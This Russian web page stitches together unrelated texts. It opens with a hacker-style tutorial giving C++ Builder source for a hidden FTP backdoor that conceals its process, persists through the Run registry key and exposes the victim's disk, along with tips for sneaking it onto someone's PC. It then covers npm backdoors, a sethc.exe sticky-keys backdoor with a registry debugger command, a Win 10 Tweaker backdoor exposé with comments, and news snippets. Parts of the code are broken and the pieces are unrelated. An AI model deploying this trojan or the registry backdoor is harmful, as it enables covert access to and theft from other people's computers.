Как создать бэкдор на windows
“Бойтесь данайцев, дары
подносящих. ”
Ахилл, админ города Троя.
Привет, перец! Сегодня расскажу тебе, как
поступить с челом, который зажимает от тебя
свои секреты (доки разные, login & password от
халявного инета и т.д.), да и вообще, не
выполняет принцип "Начал мычать - давай
молоко" 🙂
Сразу напрашивается мысль - превратить весь
хард его компа в FTP, для чего тебе
понадобятся:
1) C++ Builder (если привык писать на Западло++) или
Delphi (aka Pascal)
vip107/ics.zip.
Компоненты полезны сами по себе: тут есть
почти всё, от PING'a до MIME Decode. И в последующих
заподлянках я собираюсь их юзать по полной -
так что затаривайся их исходниками, пока
буржуи добрые 🙂
4) Немного его доверчивости/жадности.
Итак, качаешь компоненты из инета (они
халявные) и инсталишь их в палитру
компонентов C++Builder или Delphi (хелп по
установке к ним прилагается). Создаёшь
новый проект (“File->New Application”) и размещаешь
на морде окна твоей проги компонент FtpServer.
Файл Unit1.cpp привожу в масштабе 1:1 (для С++ Builder).
Если надумал писать на Дельфях - тут я тебе
не советчик.
// Объявляем тип функции и указатель на неё
typedef int (CALLBACK* lpfn)(int, int);
lpfn func;
// Заимствуем у ядра функцию регистрации
сервисного процесса
HINSTANCE hDLL = LoadLibrary("kernel32.dll");
func = (lpfn)GetProcAddress(hDLL,"RegisterServiceProcess");
// Раз - и в списке задач проги нет 🙂
func(GetCurrentProcessId(),1);
// Прячем окно проги с глаз долой
Hide();
/* Прописываем новый софт в автозагрузку 🙂 */
TRegistry *Reg = new TRegistry;
Reg->RootKey = HKEY_CURRENT_USER;
if(Reg->OpenKey("\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",true))
Reg->WriteString("Winoldap","\"" + ParamStr(0) +
"\"");
Reg->CloseKey();
delete Reg;
/* Пробуем включить сервак */
try
// Строка отклика FTP клиенту
// Которым ты, кул хацкер, будешь потрошить
машину врага
// И по которой определишь - успешно ли
внедрилась твоя прога
FtpServer1->Banner="220 Приветики, потрошитель
:)";
// Максимальное число подсоединений
// Чем больше, тем лучше (хочется скачивать,
закачивать
// и удалять - и всё сразу 🙂
FtpServer1->MaxClients=999;
// Порт - лучше не оставлять по умолчанию
// Если враг умный и смог настроить
// свой FTP на 21 порту - твоя прога просто не
запустится
FtpServer1->Port="65555";
// Поехали .
FtpServer1->Start();
>
/* Если не получается (например, порт уже
занят) - выход */
catch(. )
Close();
>
>
//-----
void __fastcall TForm1::FtpServer1Authenticate(TObject *Sender,
TFtpCtrlSocket *Client, TFtpString &UserName, TFtpString &Password,
bool &Authenticated)
AnsiString user="user"; // Ваш желаемый LOGIN
AnsiString pass="password"; // Ваш желаемый ПАРОЛЬ
:)))
/* А чтобы всякие ламеры, которые насканят
этот порт,
не мешались - делаем аутенификацию */
if(AnsiString(UserName)!=user && AnsiString(Password)!=pass)
Client->SendStr("421 Отдохни, ламер.\r\n");
>
//-----
Остальные файлы проекта остаются такими же,
как и были.
Прога прячется от дульки (Ctrl+Alt+Del) в Win98,
регистрируя свой процесс как “сервисный”.
Выследить и убить её можно, только запустив
какой-нибудь софт, который просматривает
все процессы в системе.
Achtung! Если его комп пашет под Win2000 или WinNT, то
из исходника надо выдрать кусок, где прога
прячется из списка задач, т.е. прописывает
себя как Service (только оставь функцию Hide(); ).
По непонятным причинам в списке задач по
этими типами виндов её и так не видно, чего
не скажешь о списке процессов (над этим
сейчас и работаю 🙂
Ну вот, <Ctrl>+<F9>, немцы - в Немеции,
венцы - в Венеции: прога откомпилена и
готова к употреблению (советую её сжать EXE-архиватором
ASPack - будет весть кил 200 или около того).
Теперь остаётся её красиво вручить.
Варианты:
1) Если он ламерOK - приносишь, прячешь куда-нибудь
далеко в каталогах его винды и запускаешь (пока
он вышел по Reset в ту. ).
1а) Делаешь красочный компакт с игрой (не
твоей) и прогой (твоей). Прога - в
автозагрузке копирует в винду и запускает
твою прогу, затем запускает собственно
инсталяк игры.
Бэкдор в собственном коде, который может незаметно взаимодействовать с операционной системой, это один из самых страшных кошмаров любого разработчика. В настоящий момент в npm имеется более 1.2 миллиона общедоступных пакетов. За последние три года зависимости проектов превратились в идеальную цель для киберпреступников. Экосистема npm может оказаться на удивление хрупкой в том случае, если сообщество разработчиков не обратит пристальное внимание на безопасность. В качестве доказательств этой мысли достаточно вспомнить о тайпсквоттинге и об инциденте с npm-пакетом event-stream.
Автор статьи, перевод которой мы сегодня публикуем, хочет, в образовательных целях, рассказать о том, как создавать бэкдоры для платформы Node.js.
Что такое бэкдор?
Вот какое определение понятия «бэкдор» («backdoor») даётся на ресурсе Malwarebytes: «В сфере кибербезопасности бэкдором называют любой метод, пользуясь которым авторизованные и неавторизованные пользователи могут обойти обычные меры безопасности и получить высокоуровневый доступ (root-права) к компьютерной системе, сети, приложению. После получения подобного доступа к системе киберпреступники могут использовать бэкдор для кражи персональных и финансовых данных, установки дополнительных вредоносных программ, взлома устройств».
Бэкдор состоит из двух основных частей:
- Вредоносный код, внедрённый в атакованную систему, и выполненный в ней
- Открытый канал связи, который позволяет атакующему отправлять команды бэкдору и управлять удалённым компьютером.
Зачем нам child_process?
Выполнение процесса и его взаимосвязь со стандартными потоками ввода, вывода и ошибок, играющих роль входных и выходных потоков для запущенного системного процесса
Существуют различные способы выполнения дочерних процессов. Для данной атаки легче всего воспользоваться функцией exec , которая позволяет выполнять коллбэки и помещать в соответствующие буферы то, что попадает в потоки stdout и stderr . Например — то, что будет выдано в результате выполнения команды cat passwords.txt . Обратите внимание на то, что функция exec — это не лучший способ выполнения длительных задач наподобие ping snyk.io .
Код пакета будет примерно таким:
Жертве достаточно установить пакет и воспользоваться им в Express-приложении так же, как пользуются любым пакетом промежуточного слоя:
Обратите внимание на то, что в данном случае, даже если используется Helmet , это не защищает приложение от атаки.
Вредоносный код
Реализация вредоносного кода весьма проста:
Как работает наш бэкдор? Для ответа на этот вопрос нужно учесть следующее:
Способы распространения бэкдора
Теперь, когда код бэкдора готов, нужно подумать о том, как распространять вредоносный пакет.
Первый шаг — публикация пакета. Я опубликовал пакет [email protected] в npm. Но если взглянуть на GitHub-репозиторий проекта, то вредоносного кода там не будет. Убедитесь в этом сами — взгляните на ветку проекта master и на релиз 1.0.2. Это возможно благодаря тому, что npm не сверяет код публикуемых пакетов с кодом, опубликованным в некоей системе, предназначенной для работы с исходным кодом.
Хотя пакет и опубликован в npm, его шансы на распространение пока очень низки, так как потенциальным жертвам ещё нужно найти его и установить.
Ещё один способ распространения пакета заключается в добавлении вредоносного модуля в качестве зависимости для других пакетов. Если у злоумышленника есть доступ к учётной записи с правами публикации какого-нибудь важного пакета, он может опубликовать новую версию такого пакета. В состав зависимостей новой версии пакета будет входить и бэкдор. В результате речь идёт о прямом включении вредоносного пакета в состав зависимостей популярного проекта (взгляните на анализ инцидента, произошедшего с event-stream). В качестве альтернативы злоумышленник может попытаться сделать PR в некий проект, внеся в lock-файл соответствующие изменения. Почитать об этом можно здесь.
Ещё один важный фактор, который нужно принимать во внимание, это наличие у атакующего доступа к учётным данным (имени пользователя и паролю) кого-то, кто занимается поддержкой некоего популярного проекта. Если у злоумышленника такие данные есть, он легко может выпустить новую версию пакета — так же, как это случилось с eslint.
Но если даже тот, кто занимается поддержкой проекта, использует для его публикации двухфакторную аутентификацию, он всё равно рискует. А когда для развёртывания новых версий проекта используется система непрерывной интеграции, то двухфакторную аутентификацию нужно выключать. В результате, если атакующий может украсть рабочий npm-токен для системы непрерывной интеграции (например, из логов, случайно попавших в общий доступ, из утечек данных, и из прочих подобных источников), то у него появляется возможность развёртывания новых релизов, содержащих вредоносный код.
Обратите внимание на то, что выпущен новый API (находящийся пока в статусе private beta), который позволяет узнать о том, был ли пакет опубликован с использованием IP-адреса сети TOR, и о том, была ли при публикации использована двухфакторная аутентификация.
Более того, злоумышленники могут настроить вредоносный код так, чтобы он запускался бы в виде скрипта, выполняемого перед установкой или после установки любого npm-пакета. Существуют стандартные хуки жизненного цикла npm-пакетов, которые позволяют выполнять код на компьютере пользователя в определённое время. Например, система для организации тестирования проектов в браузере, Puppeteer, использует эти хуки для установки Chromium в хост-системе.
Райан Даль уже говорил об этих уязвимостях на JSConf EU 2018. Платформа Node.js нуждается в более высоком уровне защиты для предотвращения этого и других векторов атак.
Вот некоторые выводы, сделанные по результатам исследования безопасности опенсорсного ПО:
- 78% уязвимостей обнаруживается в непрямых зависимостях, что усложняет процесс избавления от таких уязвимостей.
- За 2 года наблюдается рост уязвимостей в библиотеках на 88%.
- 81% респондентов полагают, что за безопасность должны отвечать сами разработчики. Они, кроме того, считают, что разработчики недостаточно хорошо для этого подготовлены.
Итоги: как защититься от бэкдоров?
Контролировать зависимости не всегда легко, но в этом деле вам могут помочь несколько советов:
В операционных системах Windows имеется довольно давно известная возможность организовать себе бэкдор, чтобы в будущем получить доступ к компьютеру, к которому доступа быть не должно. Сегодня хочу рассказать вам о нем, показать один из примеров его обнаружения, в самом топорном случае, а также маленько поразмышлять на эту тему.
В чем суть бэкдора? Все вы видели, что при входе в систему всегда есть кнопка «специальные возможности»
Там есть несколько утилит, таких как лупа, залипание клавиш, экранный диктор и т.п. Так вот, эти утилиты запускаются exe файлами, которые лежат в папке system32 вашей системной директории (по умолчанию – c:\windows\system32).
Если заменить оригинальные файлы, например командной строкой (cmd.exe), или еще чем-нибудь, где можно выполнять команды или что-нибудь запустить, то при запуске этих утилит из раздела специальных возможностей, преспокойно запустится замененный файл, и дальше можно делать всё что душе угодно.
Вот примеры исполняемых файлов, которые отвечают за специальные возможности:
sethc.exe – залипание клавиш
osk.exe – экранная клавиатура
Narrator.exe – экранный диктор
Magnify.exe – экранная лупа
DisplaySwitch.exe – переключение экрана
Напишите в комментариях, если что-то упустил.
В обычном случае, просто заменить эти файлы не удастся, т.к. не хватит прав. Для того что бы получить необходимые права сперва необходимо стать владельцем файла (в свойствах файла – вкладка безопасность – дополнительно – изменить владельца, само собой делать это нужно от имени администратора).
После чего во вкладке безопасность нужно дать полный доступ нужному пользователю на файл, и после этого можно заменить файл, например файлом cmd.exe.
Так же можно загрузиться с livecd, и если диск не зашифрован, то заменить файлы можно вообще без каких-либо проблем с правами.
Всё – теперь на экране ввода пароля можно пять раз быстро нажать shift (если будет заменен sethc.exe) и должна запуститься командная строка с повышенными привилегиями, где можно добавить администраторскую учетку и дальше делать всё что угодно на компьютере.
По мимо простой замены файлов, можно пойти несколько более хитрым путем – для утилит sethc.exe и utilman.exe в реестре можно добавить опцию debugger, и результат будет как при замене файлов. К примеру, это может сделать команда:
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "c:\windows\system32\cmd.exe"
Как же с этим бороться? Как всегда – подобную пакость гораздо проще предупредить, чем обнаруживать. Поэтому – не давайте кому попало админских прав и включайте шифрование дисков.
Так же данный бэкдор может обнаружить windows defender – поэтому не стоит его отключать.
Пожалуй, один из очевидных и простых способов обнаружения – это запустить все средства специальных возможностей вручную, и проверить – запускается то, что нужно или нет. Хотя он не может гарантировать результат, т.к. не исключено, что злоумышленник может сделать свои утилиты, которые в точности будут копировать функционал оригинальных, и только при определенных событиях, например, при нажатии определенной комбинации клавиш, запускать нужную программу.
Еще на просторах интернета был обнаружен - ]]> интересный скрипт ]]> , для совсем топорных вариантов оставления описываемой возможности доступа к системе. Я его ]]> немного переделал ]]> , что бы он работал на старых версиях powershell (проверял на версии 2). Он работает по следующему принципу – вычисляет хэш для cmd.exe, explorer.exe и powershell.exe и сравнивает их со значением хэш сумм вышеописанных утилит. Если они совпадут, значит злоумышленник подменил файлы, и скрипт об этом сообщит. По мимо сравнения файлов, так же анализируется 2 ветки реестра, на предмет опции /debugger для утилит sethc.exe и utilman.exe.
К сожалению, данный скрипт, конечно же, тоже не является панацеей, т.к. злоумышленник вполне может использовать тот же cmd другой версии с другого компьютера, и хэш суммы у оригинальной и подмененной версий будут разными, ну или опять же может спокойно создать свой исполняемый файл. Вообще эта тема довольно обширная и 100% сценарий для обнаружения не сможет дать никто, и заметка эта написана с целью, что бы вы знали, что такая возможность у злоумышленников существует. А что с этой информацией делать – решать вам.
И да – часто советуют полностью отключать в панели управления/групповых политиках/еще где то специальные возможности, якобы это вас убережет… Нет, не убережет, если у злоумышленника есть админский или физический доступ к компьютеру, то ему не составит никакого труда изменить ваши настройки, или сделать так что бы они сами постоянно менялись. Короче будьте бдительны.
Перепечатка статьи с Хабра (вернее с ее копии), которая была удалена, где освещалась проблема того, что Win 10 Tweaker с осени 2020 года был, оказывается, интегрирован самый обычный бэкдор с возможностью исполнения зловредного кода, выполняющегося от имени администратора. Ресурс с которого скачивался зловредный код в открытом виде располагался на https://win10tweaker.com/PrivilegeUser.php?key=Universal . Но автор уже закрыл доступ к нему и с выходом версии 17.3 beta "согласился" якобы удалить функционал бэкдора.
Но интернет всё помнит
• Скачиваем с сайта последнюю версию программы. Сейчас скачивается версия 17.2, SHA-256: 06DB5801D37895C75B7D60FA5971827DA80CC275D9E78E5986A120C003021A0D;
• Запускаем Win 10 Tweaker и принимаем правой кнопкой соглашение;
• Хватит лишь открытия раздела "Системная информация", где можно получить сведения о характеристиках ПК;
Пикабу не позволяет вставлять код в статью, поэтому ссылку на зловредный код разместил на pastebin:
Разберем по-быстрому код.
• Берется путь профиля и присобачивается к нему "\\AppData\\Local\\ Turbo.net ";
• Если такой на вашу беду находится, то получаем значения ключей UninstallString в разделе HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall. В этом параметре хранится команда для деинсталляции программ. Собственно, именно эта команда запускается, когда вы удаляете в Windows любую программу, если ее деинсталлятор прописывается в системе.
• Сохраняем полученные строки и записываем первые 50 команд на удаление в автозагрузку для всех пользователей. Отныне при первой перезагрузке запустят свои деинсталляторы те программы, у которых есть свойство UninstallString.
Скажите спасибо, что не в тихом режиме все удаляется, и окошки с уведомлением об удалении будут видны в любом случае.
Осенью же на этом ресурсе располагался другой код, устанавливающий пароль на учетную запись. Пароль, как нетрудно догадаться, глядя на код, был Rock5taR. То есть ресурс один, а зловредный код иногда да и меняется.
Автор сам признал, что у программы была незадокументированная возможность, Соглашение, принимаемое перед использованием программы, позволяет ему делать, что угодно.
Автор заявляет о портативности программы, что на самом деле не так: чего только стоит создание неудаляемого ключа в реестре по пути HKCU\Software\Win 10 Tweaker, так как программа меняет права доступа на этот раздел.
Видео с одним из вариантов, как удалить ключ.
Уже после опубликования статьи другой пользователь доказал на видео, что, получи злоумышленники доступ к ресурсу, где размещался зловредный код, и можно было осуществить перенаправление трафика уже на их ресурс с другим зловредным кодом
Остается тайной, зачем автор в борьбе с пиратами, беря за программу в том числе и плату, интегрировал туда самый обычный бэкдор. И кто знает, что еще она в себе таит… Выводы, как всегда, делать только вам.
Разработчик трояна считает, что всё сделал правильно, мы все убоги и, оказывается, завидуем его успеху, а этот "инцидент" — жирный намек.
Kaspersky уже детектит версию 17.2 как бэкдор.
Хауди Хо, который когда-то рекламировал Win 10 Tweaker уже скрыл своё видео, написав пост в группе в Telegram. После выпустил ролик с призывом не пользоваться этим трояном, но после угроз от Хачатура (автора трояна) скрыл кусок уже опубликованного ролика.
Стас "Ай, как просто" тоже выпустил ролик, где извиняется перед аудиторией, что когда-то тоже рекламировал этот троян (с привязкой ко времени). Но Хачатур уже готовит иск к нему.
На его форуме вообще тоталитарная секта. И особенно доставляет, как автор Win 10 Tweaker пишет "я" и "мне" в середине предложения с большой буквы. xD
А в чем драма?
Автор проги какой-то видный уважаемый чел или что?
Что с того, что он там угрожает кому-то?
Почему просто нельзя его нахуй послать?
Сам этой прогой никогда не пользовался и не знал даже о ней
Вообще в недоумении, что новость такие бурления вызывает - мне кажется очевидным, что такому софту веры нет, а тут прям срывы покровов
Такой софт напичкан подобным говном как пирожок ливером жи
И дебилы такие на форумах "Винда 10 вся дырявая и полная телеметрии, кровавый Билли будет следить за нами!", ставят кучу всякого говна и твикеров. с бэкдорами
Хорошая оптимизация системы. -50 программ и винда будет летать =)
Повторится ли на пикабу сценарий хабра? Запасы попкорна приготовлены.
А почему с хабера тему потерли?
Бесят подобные софтописатели. Они считают, что могут позволять делать все что угодно с железками пользователей. И самое интересное, что есть юзвери, которые таких разрабов поддерживают. Когда-то keenetic внедрил в свою прошивку бекдор. Если он детектировал, что устройство не zyxel, то превращал его в кирпич. Я возмутился фактом наличия бекдора и сами адепты кинетика, вместо того, чтобы спросить с разрабов, с чего их роутера имеют бекдор и сливают инфу на сервера кинетика, закидали меня шапками. Типа, тебе не пох, этож от пиратов. Так же сейчас поступил ugoos со своими приставками. Практически молча обновой зашифровали загрузчик и прошили фьюзы. Теперь сторонние прошивы поставить нельзя. А один из админов их телеграм канала, который продаёт допиленную прошивку АТВ под ugoos сообщил, что в его прошивках бекдор и он любой бокс окирпичить может. Только сообщил не до распродажи его прошивки, а после :))) И что самое интересное, что модераторы 4пда инфу об этом всячески трут, а адепты ugoos с пеной у рта пытаются доказать, что все ок, другие прошивки не нужны, бекдор - это такая защита, а все кто задают неудобные вопросы - хейтеры, воры и абузят молодых разработчиков. Давно пользуюсь твикером, после прочтения поста очень грустно стало. Пока до конца не понимаю куда вертеть диван. Смотря канал Хачатура, думал что это адекватный программист, а сейчас посеяно зерно сомнения. Спасибо за информацию.Читал на хабре до удаления. Почему удалили? Админы хабры очередной раз сделали прогиб жопой кверху за бабло?
Нифига не понятно ))
кому надо создать, самому пользователю ? Чет такое себе )
пока не понятно, куда диван разворачивать. ещё подожду. а пока жду, спрошу.
ТС, ты ради этого разоблачения зарегался?
Там хачатур ответку выпустил LOL
Ждал, когда ж на пикабу запостят. ТС, когда на тебя автор будет наезжать, держи нас в курсе.
Спасибо за разбор. Пользовался 1 раз этой программой. Через время скачал снова, но винда просто не дала её запустить и тут закралось подозрение А вообще, ловко конечно автор программы хомяков нагнул! Вшил бэкдор, а они ему за это ещё и деньги платят! ))На всякий случай добавил в hosts
ппц буквально 4 дня назад узнал об этой проге и протестировал. охуеть. даже задонатить хотел
Щас Христ на тебя суд подаст! ))
Реклама софии. Если вы настолько тупые, что не смогли прочитать полностью лицензионное соглашение Христа и запустить программу, то это только ваши проблемы. Ни разу не было проблем с Win 10 Tweaker. В комментах столько великих хакеров и кодеров, а до сих пор в РФ нет своей ОС :)
Win10 умнее большинства юзеров, нахуя её твикать?
Любой tweaker по своему назначению уже бэкдор.
Отключая обновления официальной ОСи и приложений - вы отключаете стратегию безопасности.
Использование любых tweakerов патчеров оптимизаторов и прочего всегда было и будет вашим личным персональным риском за который никто кроме вас не несёт ответственности.
А ваше незнание, слепое доверие программам, вера в то, что вы никому не нужны в Сети и желание поскорее избавиться от назойливой Windows или лишних уведомлений или ограничений в Linux, есть ваше реализованное право на глупость.
Да ставь, всё норм. это винда просто на кряк ругается! чо ты как не мужик!?
Если и использовать какой твикер - то с открытыми исходниками.
Но, с другой стороны - какие-то твикеры использовать надо. Хотя бы для того, чтобы убить к чертям собачьим кортану. И долбанутая политика обновлений от MS меня тоже абсолютно не радует. Да и такое, чтобы винда при обновлении убивала совершенно невинную программу - тоже было. В моем случае ей не понравился Foxit Reader.
В общем, получается IT-шная версия загадки про два стула.
За такой паршивый код хочется обоссать разработчика
Небольшой оффтоп, может кто знает, что за лаунчер такой красивый на превью видео?
А на кой эта программа вообще нужна?
Идём на гитхаб, ищем optimizer, удаляет всякое предустановленное говно, кортану и прочее, при этом выложен с исходным кодом, и параноики могут скомпилить сами.Надеюсь, в WinAero Tweaker нет таких дыр? А то уж очень он удобен для возвращения 10ке многих полезных функций (вроде нормальной Панели Управления).
“Соглашение, принимаемое перед использованием программы, позволяет ему делать, что угодно.“
За щеку взять например
Не юзайте всякие твикеры-хуикерв и не будет бэкдоров Что то на какой то вброс похоже. Почему на хабре то статью убрали? Постоянно пользуюсь твикером и никогда проблем не было. Люблю всякие твикеры, ну и этот за компанию. Желание пользователей при помощи чудо-программы разогнать свой винтажный селерон до современных требований и настроить ОСь чтоб было все великолепно стабильно обеспечивали меня куском вкусного сыра не хуже всяких вирусописак, пока я активно эникейством зарабатывал.Есть у меня сборка 10ки, и там по дефолту на рабочем столе этот твикер лежит. Начинаешь установку, он просит принять лицензионное соглашение. Нажимаешь на "Принять", а он такой "Нет-нет, читай полностью". Проматываешь полностью, и в ответ "Нет-нет, не так быстро". Отмена, выделить, shift+del. И судя по всему не пожалел ни разу.
В Windows 10 добавят две новые системы для борьбы с читерами
Компания Microsoft анонсировала две новые античит-системы, которые будут добавлены в Windows 10 с осенним обновлением Creators Update. Называться они будут TruePlay и Game Monitor.
Первая разработана эксклюзивно для игр компаний и будет работать на базе UWP, платформы приложений для Windows 10. Game Monitor будет работать со всеми играми, собирая информацию о системе пользователя и отправляя ее в Microsoft. Предположительно, обе системы будут отслеживать запуск запрещенных программ, проверять эту информацию, и только потом блокировать нечестных пользователей.
Отмечается, что личная информация игроков пострадать не должна: системы якобы будут собирать ее только при активации запрещенных программ. Тем не менее, по мнению некоторых пользователей, это еще одна попытка компании устроить тотальную слежку.
Специалисты «Доктор Веб» рассказали, как мошенники зарабатывают на «договорных матчах»
Обычно создатели таких ресурсов выдают себя за отставных тренеров или спортивных аналитиков. Но на самом деле никакой инсайдерской информации у мошенников, конечно, нет. Просто часть пользователей получает один спортивный прогноз, а другая часть — прямо противоположный. Если кто-то из пострадавших заподозрит обман и возмутится, ему предложат получить следующий прогноз бесплатно в качестве компенсации за проигрыш.
Специалисты отмечают, что существует и альтернативный вариант данной схемы: злоумышленники отправляют жертве защищенный паролем файл Microsoft Excel, содержащий специальный макрос. Этот макрос аналогичным образом подставляет в таблицу требуемый результат в зависимости от введенного пароля.
Исследователи напоминают, что не стоит доверять сайтам, предлагающим разбогатеть благодаря ставкам на тотализаторе с использованием инсайдерской информации, даже если обещания мошенников выглядят правдоподобно и убедительно.
Глава компании SEC Consult взломал мошенников, прислав им вредоносный PDF
В начале августа 2016 года французский исследователь Иван Квиатковски проучил мошенников, выдававших себя за специалистов технической поддержки. Дело в том, что скаммеры атаковали родителей специалиста, с чем он мириться не пожелал и хитростью вынудил мошенника установить шифровальщика Locky на свой компьютер. О похожем поступке недавно рассказал и глава сингапурского подразделения компании SEC Consult, Флориан Лукавски (Florian Lukavsky). Он сумел скомпрометировать мошенников более крупного калибра и передал все собранные о них данные в руки правоохранительных органов.
О содеянном Лукавски рассказал журналистам издания The Register на конференции Hack in the Box, прошедшей в Сигнапуре, в августе 2016 года. Эксперту удалось разоблачить так называемых скаммеров-китобоев (или whaling-скаммеров). Основной бизнес таких парней заключается в организации хитроумных афер с применением социальной инженерии. Мошенники рассылают сотрудникам крупных, прибыльных предприятий письма, которые замаскированы под послания от начальства или от руководителей фирм-партнеров. В письмах поддельный босс просит сотрудников срочно перевести деньги на какой-либо банковский счет, который на самом деле принадлежит злоумышленникам.
Данная схема работает очень эффективно. Так, по данным ФБР, за семь месяцев было зафиксировано более 14 000 случаев whaling-мошенничества, а компании суммарно лишились более чем 2,2 млрд долларов. Среди пострадавших, были такие всемирно известные компании, как Mattel, потерявшая 3 млн долларов, Ubiquiti, лишившаяся 46,7 млн долларов, и бельгийский банк Crelan, чьи потери составили 78 млн долларов. При этом вернуть средства удается очень редко. К примеру, компания Ubiquiti сумела вернуть лишь 9 млн долларов из похищенных 46,7 млн.
Лукавски применил к мошенникам их же методы. Эксперт сумел скомпрометировать Microsoft-аккаунты злоумышленников.
Парольные хеши Windows 10 не продержались долго, и вскоре исследователь предоставил полиции данные, которые позже привели к аресту ряда лиц в Африке.
Читайте также: